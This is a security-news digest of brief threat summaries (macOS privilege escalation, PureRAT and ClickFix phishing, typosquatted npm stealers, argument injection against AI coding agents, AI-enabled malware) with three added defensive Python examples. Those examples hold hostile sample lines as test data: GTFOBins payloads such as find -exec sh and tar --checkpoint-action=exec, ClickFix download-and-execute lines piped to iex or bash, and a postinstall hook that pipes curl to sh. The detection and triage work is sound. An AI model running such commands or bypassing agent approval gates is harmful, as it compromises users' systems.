Ivanti and Zoom have released security patches to address multiple critical vulnerabilities in their products, including issues that could allow remote code execution, privilege escalation, and information disclosure. Users are urged to update their systems promptly to prevent potential exploitation. #IvantiEMP #ZoomVulnerabilities…
Tag: MACOS
A race in osanalyticshelperd’s crash-report creation allowed an attacker to combine sandbox-extension abuse, XPC message manipulation, and a non-atomic rename to place files (including a sudoers entry) as root on macOS, enabling local privilege escalation (CVE-2025-24277) and potential sandbox escape. The issue was fixed by restricting the XPC call with the entitlement com.apple.private.osanalytics.write-logs.allow. #osanalyticshelperd #CVE-2025-24277
A widespread phishing campaign targeting the hospitality industry uses spear-phishing emails impersonating Booking.com to infect hotel systems with PureRAT malware, stealing credentials and personal data. The campaign has been active since April 2025, employing sophisticated social engineering tactics and marketplaces for stolen Booking.com logs. #PureRAT #Booking.com #Expedia #LolzTeam…
Two AI agents with pre-approved commands can still be exploited via argument injection, enabling remote code execution (RCE) despite human approval. The post outlines antipatterns, real-world attack examples across three platforms, and practical defenses like sandboxing and argument separation.
#argumentinjection #RCE #sandboxing #GTFOBINS #LOLBINS…
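Added example, not code from the post summarized above: a minimal approval gate for an agent's shell commands, in Python, showing the antipattern (approve on the executable name alone) beside a check that treats every argument as data, which is the property the post's "argument separation" defense is after. The approved binaries, the vetted option tokens and the git subcommand list are a hypothetical operator policy, and the GTFOBins/LOLBins-style payloads (find -exec, tar --checkpoint-action, git -c core.pager) are illustrative inputs; nothing here executes a command.

```python
"""Argument-injection gate for agent-issued commands (added example, hypothetical policy)."""
import shlex

# Hypothetical operator policy: binaries the agent may run and, per binary, the
# exact option tokens a human has vetted. Anything else that starts with '-' is
# rejected, because a pre-approved program's own options are how GTFOBins
# turns "read-only" tools into code execution.
APPROVED_OPTIONS = {
    "find": {"-name", "-type", "-maxdepth"},
    "git": {"--oneline", "--stat"},
    "tar": {"-tf", "-t", "-f"},
    "ls": {"-l", "-a"},
}
# For git the first operand is a subcommand and must be vetted too.
APPROVED_FIRST_OPERAND = {
    "git": {"log", "status", "diff"},
}


def naive_is_approved(cmdline: str) -> bool:
    """Antipattern: the human approved 'find', so anything starting with 'find' passes."""
    argv = shlex.split(cmdline)
    return bool(argv) and argv[0] in APPROVED_OPTIONS


def hardened_check(cmdline: str):
    """Return (approved, argv) or (False, reason).

    argv is meant for subprocess.run(argv) with shell=False; the shell never
    sees the string, so metacharacters in operands are inert.
    """
    try:
        argv = shlex.split(cmdline)
    except ValueError as exc:  # unbalanced quotes etc.
        return False, f"unparseable: {exc}"
    if not argv:
        return False, "empty command"
    binary, args = argv[0], argv[1:]
    if binary not in APPROVED_OPTIONS:
        return False, f"binary not approved: {binary}"

    operands = []
    for arg in args:
        if arg.startswith("-"):
            # Judge the option by its name only, so
            # --checkpoint-action=exec=id is decided by "--checkpoint-action",
            # not by whatever follows the '='.
            name = arg.split("=", 1)[0]
            if name not in APPROVED_OPTIONS[binary]:
                return False, f"option not approved for {binary}: {name}"
        else:
            operands.append(arg)

    wanted = APPROVED_FIRST_OPERAND.get(binary)
    if wanted is not None and (not operands or operands[0] not in wanted):
        return False, f"subcommand not approved for {binary}: {operands[:1]}"
    return True, argv


if __name__ == "__main__":
    for line in (
        "find . -name '*.py'",
        "find . -exec sh -c id \\;",
        "tar -tf backup.tar --checkpoint=1 --checkpoint-action=exec=id",
        "git -c core.pager='sh -c id' log",
    ):
        print(f"{line!r}: naive={naive_is_approved(line)} hardened={hardened_check(line)}")
```

The allowlist is exact-token on purpose: expanding clustered short options (`-tf`) would break tools such as find whose long options take a single dash. Where a tool honors `--`, placing it before the operands gives the same guarantee at the program's own option parser; this gate does not reorder arguments, so it does not insert it. Sandboxing, the post's other defense, limits what an approved command can reach and is independent of this check.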
A security flaw in Samsung Galaxy devices was exploited as a zero-day to deliver the espionage tool LANDFALL, targeting Middle Eastern users. The campaign involved malicious WhatsApp images and exploited two unpatched vulnerabilities, revealing advanced command-and-control techniques. #CVE-2025-21042 #LANDFALL #StealthFalcon…
A phishing campaign called “I Paid Twice” targeted hotel establishments by using compromised Booking.com accounts and ClickFix social engineering to deliver PowerShell commands that deploy PureRAT, enabling theft of booking-extranet credentials and subsequent customer-targeted banking phishing. The operation leveraged a redirection/TDS infrastructure, hundreds of malicious domains, and a cybercrime ecosystem selling Booking.com logs and services such as traffers and log checkers. #PureRAT #ClickFix
ClickFix attacks have become more sophisticated by incorporating videos, timers, and OS detection to deceive victims into executing malicious commands. These tactics aim to steal information by tricking users into pasting harmful code, often through fake CAPTCHA verifications. #ClickFix #CloudflareCaptcha #Malvertising
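Added example, not from either of the two ClickFix items above: detection logic, in Python, run over constructed command lines of the kind a ClickFix lure has the victim paste into the Windows Run dialog or a terminal (as they would appear in a process-creation event or the RunMRU registry key). The rules encode the traits the items describe: a hidden window, policy bypass, a fetch piped straight into an interpreter, and the fake CAPTCHA "verification" comment that the pasted command carries as a decoy. The rule set and the sample lines are my own; hostnames use the reserved .example TLD.

```python
"""ClickFix command-line triage (added example; rules and samples are constructed)."""
import re

# Each rule names one trait; a line is flagged on one high-confidence trait or
# on two weaker ones, so a plain "-WindowStyle Hidden" admin script is not enough.
RULES = {
    "hidden_window": re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download_pipe_exec": re.compile(
        r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget)\b.*\|\s*"
        r"(?:iex|invoke-expression|sh|bash|zsh)\b", re.I),
    "mshta_remote": re.compile(r"\bmshta(?:\.exe)?\s+[\"']?https?://", re.I),
    "base64_to_shell": re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:sh|bash|zsh)\b", re.I),
    # The lure appends a comment so the Run dialog looks like a CAPTCHA step.
    "captcha_decoy": re.compile(r"not a robot|captcha|verification id", re.I),
}
HIGH_CONFIDENCE = {"download_pipe_exec", "mshta_remote", "base64_to_shell"}

# Constructed sample command lines: four lures, three benign admin commands.
SAMPLE_LOG = [
    'powershell -w hidden -ep bypass -c "iwr http://captcha-check.example/v.ps1 | iex" '
    '# I am not a robot - reCAPTCHA Verification ID: 8731',
    'mshta https://verify.example/captcha.hta',
    '/bin/bash -c "echo aGVsbG8gd29ybGQK | base64 -d | bash"',
    'powershell -Command "Get-Process | Sort-Object CPU -Descending"',
    'curl -fsSL https://downloads.example/tool.tar.gz -o tool.tar.gz',
    'cmd /c "curl -s https://verify.example/step | sh" # Verification complete',
    'powershell -WindowStyle Hidden -Command Get-Date',
]


def classify(cmdline: str) -> list:
    """Names of every rule that matches the command line, in rule order."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def is_clickfix(cmdline: str) -> bool:
    hits = classify(cmdline)
    return bool(HIGH_CONFIDENCE & set(hits)) or len(hits) >= 2


def scan(lines) -> list:
    """(index, matched rules) for every flagged line."""
    return [(i, classify(line)) for i, line in enumerate(lines) if is_clickfix(line)]


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG):
        print(f"[{idx}] {', '.join(hits)}: {SAMPLE_LOG[idx]}")
```

The decoy comment is worth keeping as a rule even though it is weak on its own: it is the one part of the pasted line the attacker controls for the victim's benefit rather than the machine's, and the OS-detection and timer tricks the item describes change the lure page, not that comment. Feed real RunMRU values or Sysmon Event ID 1 command lines to `scan` unchanged.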
Google has released an emergency update for Chrome 142 to fix critical remote code execution vulnerabilities, including a high-severity flaw in WebGPU. The update is being rolled out gradually across desktop and Android devices to enhance security and prevent potential exploits. #WebGPU #CVE-2025-12725…
Google Threat Intelligence Group (GTIG) reports that adversaries have progressed from using AI for productivity to deploying novel AI-enabled malware that dynamically alters behavior during execution, exemplified by families like PROMPTFLUX and PROMPTSTEAL. The report documents state-backed and criminal actors misusing Gemini and other LLMs across the attack lifecycle and details mitigations Google has taken, including disabling assets and strengthening model and classifier safeguards. #PROMPTFLUX #PROMPTSTEAL
Socket’s Threat Research Team discovered 10 typosquatted npm packages that execute a multi-stage credential stealer via npm’s postinstall hook, using four layers of JavaScript obfuscation, a fake CAPTCHA prompt, IP fingerprinting, and a downloaded 24MB PyInstaller data_extracter binary to harvest credentials across Windows, Linux, and macOS. The campaign’s packages (published July 4, 2025) accumulated over 9,900 downloads; the npm registry was contacted for takedown, and the actor registered the packages under the alias andrew_r1 (parvlhonor@gmx[.]com). #data_extracter #andrew_r1
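Added example, not Socket's tooling: a pre-install triage, in Python, of the two traits the item above combines, a name one edit away from a popular package and an install-time lifecycle script that fetches or evaluates code. It runs over constructed package.json contents; the package names, the "popular" list it compares against and the indicator patterns are assumptions made for the example, not a published feed.

```python
"""Triage npm packages before their lifecycle hooks run (added example)."""
import re

# Lifecycle scripts that `npm install` runs without prompting.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Hypothetical list of heavily depended-upon names a typosquat would imitate.
POPULAR = ["typescript", "lodash", "express", "react", "axios", "chalk"]

# Indicators that a hook fetches or evaluates code rather than, say, building a native addon.
SUSPICIOUS = [
    ("inline_node", re.compile(r"\bnode\s+-e\b")),
    ("downloader", re.compile(r"\b(?:curl|wget)\b")),
    ("pipe_to_shell", re.compile(r"\|\s*(?:sh|bash)\b")),
    ("remote_url", re.compile(r"https?://")),
    ("spawns_process", re.compile(r"child_process")),
    ("encoded_payload", re.compile(r"base64|\beval\(")),
]


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; a dropped or swapped letter is what typosquats rely on."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_lookalike(name: str):
    """Popular name within two edits of `name`, or None (exact matches are not lookalikes)."""
    if name in POPULAR or len(name) < 5:
        return None
    best = min(POPULAR, key=lambda p: levenshtein(name, p))
    return best if levenshtein(name, best) <= 2 else None


def inspect_hooks(scripts: dict) -> tuple:
    """(install-time hooks present, indicator names found in their bodies)."""
    hooks = {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}
    body = "\n".join(hooks.values())
    found = [label for label, rx in SUSPICIOUS if rx.search(body)]
    return hooks, found


def assess(package_json: dict) -> dict:
    name = package_json.get("name", "")
    hooks, found = inspect_hooks(package_json.get("scripts", {}))
    lookalike = find_lookalike(name)
    if hooks and (found or lookalike):
        verdict = "block"      # runs code at install AND looks like a stealer or a squat
    elif hooks or lookalike:
        verdict = "review"     # legitimate native modules also have install hooks
    else:
        verdict = "ok"
    return {"name": name, "install_hooks": hooks, "suspicious": found,
            "lookalike_of": lookalike, "verdict": verdict}


# Constructed package.json contents; the address is TEST-NET-3, the names are invented.
SAMPLE_PACKAGES = [
    {"name": "typescrip", "version": "5.4.2", "scripts": {"postinstall":
        "node -e \"require('child_process').execSync('curl -s http://203.0.113.5/i.sh | sh')\""}},
    {"name": "left-pad", "version": "1.3.0"},
    {"name": "native-helper", "version": "2.0.1",
     "scripts": {"postinstall": "node install.js", "test": "jest"}},
]


if __name__ == "__main__":
    for pkg in SAMPLE_PACKAGES:
        print(assess(pkg))
```

To apply this before anything runs, fetch the manifest without installing (`npm view <name> scripts` prints the scripts object) and install with `npm install --ignore-scripts` or `npm config set ignore-scripts true`, re-enabling hooks only for packages the triage cleared.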
A critical security flaw in the “@react-native-community/cli” npm package has been patched, which allowed remote attackers to execute arbitrary OS commands. The vulnerability, CVE-2025-11953, posed a significant risk due to its ease of exploitation and broad attack surface. #ReactNative #CVE202511953…
A critical vulnerability (CVE-2025-11953) has been discovered in the React Native Community CLI NPM package, which could allow threat actors to execute arbitrary commands on affected systems. Meta has promptly patched the issue and urges developers to update to version 20.0.0 to mitigate the risk. #CVE202511953 #ReactNative…
Google’s AI agent Big Sleep uncovered multiple vulnerabilities in Apple’s WebKit, leading to potential crashes and memory corruption in Safari. Apple addressed these issues in the latest updates across various devices and operating systems, highlighting ongoing AI-driven security advancements. #BigSleep #WebKitVulnerabilities…
Apple has released significant security updates for iOS, iPadOS, and macOS to fix over 100 vulnerabilities, including critical WebKit flaws. These patches address issues that could lead to data leaks, system crashes, and privilege escalation, enhancing device security. #WebKit #KernelMemoryCorruption…
The Akira ransomware gang claims to have stolen 23 GB of sensitive data from Apache OpenOffice, raising concerns about security in open-source projects. The incident highlights the increasing threat of ransomware targeting nonprofit organizations and software foundations. #Akira #ApacheOpenOffice…